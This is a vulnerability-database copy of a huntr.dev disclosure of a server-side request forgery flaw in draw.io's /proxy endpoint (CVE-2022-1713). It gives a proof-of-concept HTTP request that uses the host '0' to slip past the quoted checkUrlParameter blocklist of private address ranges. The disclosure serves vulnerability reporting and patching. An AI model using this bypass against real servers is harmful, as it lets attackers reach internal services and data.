Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrCaioludersCAD3902F-3AFB-4ED2-ABD0-9F96A248DE11
HistoryMay 13, 2022 - 1:30 a.m.

SSRF on /proxy

2022-05-1301:30:42
caioluders
www.huntr.dev
106
ssrf bypass protection vulnerability

EPSS

0.021

Percentile

89.2%

JSON

Description

draw.io is vulnerable to SSRF on the /proxy endpoint. It’s trivial to bypass the protections on checkUrlParameter.

Proof of Concept

  1. Make a request to proxy?url=http%3a//0:8080/
GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: 127.0.0.1:8080
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/?mode=device&title=Untitled%20Diagram.drawio.xml&create=https%3A%2F%2Fxcd8bz39zlnis2ngq84j05tt7kda1z.oastify.com%2F&sync=manual&db=0&gh=0&tr=0&gapi=0&od=0&gl=0
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

The url parameter is set to http%3a//0:8080/ bypassing the checkUrlParameter function :

public boolean checkUrlParameter(String url)
	{
		if (url != null)
		{
			try
			{
				URL parsedUrl = new URL(url);
				String protocol = parsedUrl.getProtocol();
				String host = parsedUrl.getHost().toLowerCase();

				return (protocol.equals("http") || protocol.equals("https"))
						&& !host.endsWith(".internal")
						&& !host.endsWith(".local")
						&& !host.contains("localhost")
						&& !host.startsWith("0.") // 0.0.0.0/8
						&& !host.startsWith("10.") // 10.0.0.0/8
						&& !host.startsWith("127.") // 127.0.0.0/8
						&& !host.startsWith("169.254.") // 169.254.0.0/16
						&& !host.startsWith("172.16.") // 172.16.0.0/12
						&& !host.startsWith("172.17.") // 172.16.0.0/12
						&& !host.startsWith("172.18.") // 172.16.0.0/12
						&& !host.startsWith("172.19.") // 172.16.0.0/12
						&& !host.startsWith("172.20.") // 172.16.0.0/12
						&& !host.startsWith("172.21.") // 172.16.0.0/12
						&& !host.startsWith("172.22.") // 172.16.0.0/12
						&& !host.startsWith("172.23.") // 172.16.0.0/12
						&& !host.startsWith("172.24.") // 172.16.0.0/12
						&& !host.startsWith("172.25.") // 172.16.0.0/12
						&& !host.startsWith("172.26.") // 172.16.0.0/12
						&& !host.startsWith("172.27.") // 172.16.0.0/12
						&& !host.startsWith("172.28.") // 172.16.0.0/12
						&& !host.startsWith("172.29.") // 172.16.0.0/12
						&& !host.startsWith("172.30.") // 172.16.0.0/12
						&& !host.startsWith("172.31.") // 172.16.0.0/12
						&& !host.startsWith("192.0.0.") // 192.0.0.0/24
						&& !host.startsWith("192.168.") // 192.168.0.0/16
						&& !host.startsWith("198.18.") // 198.18.0.0/15
						&& !host.startsWith("198.19.") // 198.18.0.0/15
						&& !host.endsWith(".arpa"); // reverse domain (needed?)
			}
[...]

On this PoC we used the 0 host that it’s equal to 0.0.0.0.
There are several ways to bypass this protection.

Related

osv 1
nvd 1
cve 1
cvelist 1
nuclei 1
prion 1
osv
osv
CVE-2022-1713
2022-05-16 15:15:10
nvd
nvd
CVE-2022-1713
2022-05-16 15:15:10
cve
cve
CVE-2022-1713
2022-05-16 15:15:10
cvelist
cvelist
CVE-2022-1713 SSRF on /proxy in jgraph/drawio
2022-05-16 14:31:52
nuclei
nuclei
Drawio <18.0.4 - Server-Side Request Forgery
2022-05-26 19:13:38
prion
prion
Server side request forgery (ssrf)
2022-05-16 15:15:00

EPSS

0.021

Percentile

89.2%

JSON
Related for CAD3902F-3AFB-4ED2-ABD0-9F96A248DE11
osv1nvd1cve1cvelist1nuclei1prion1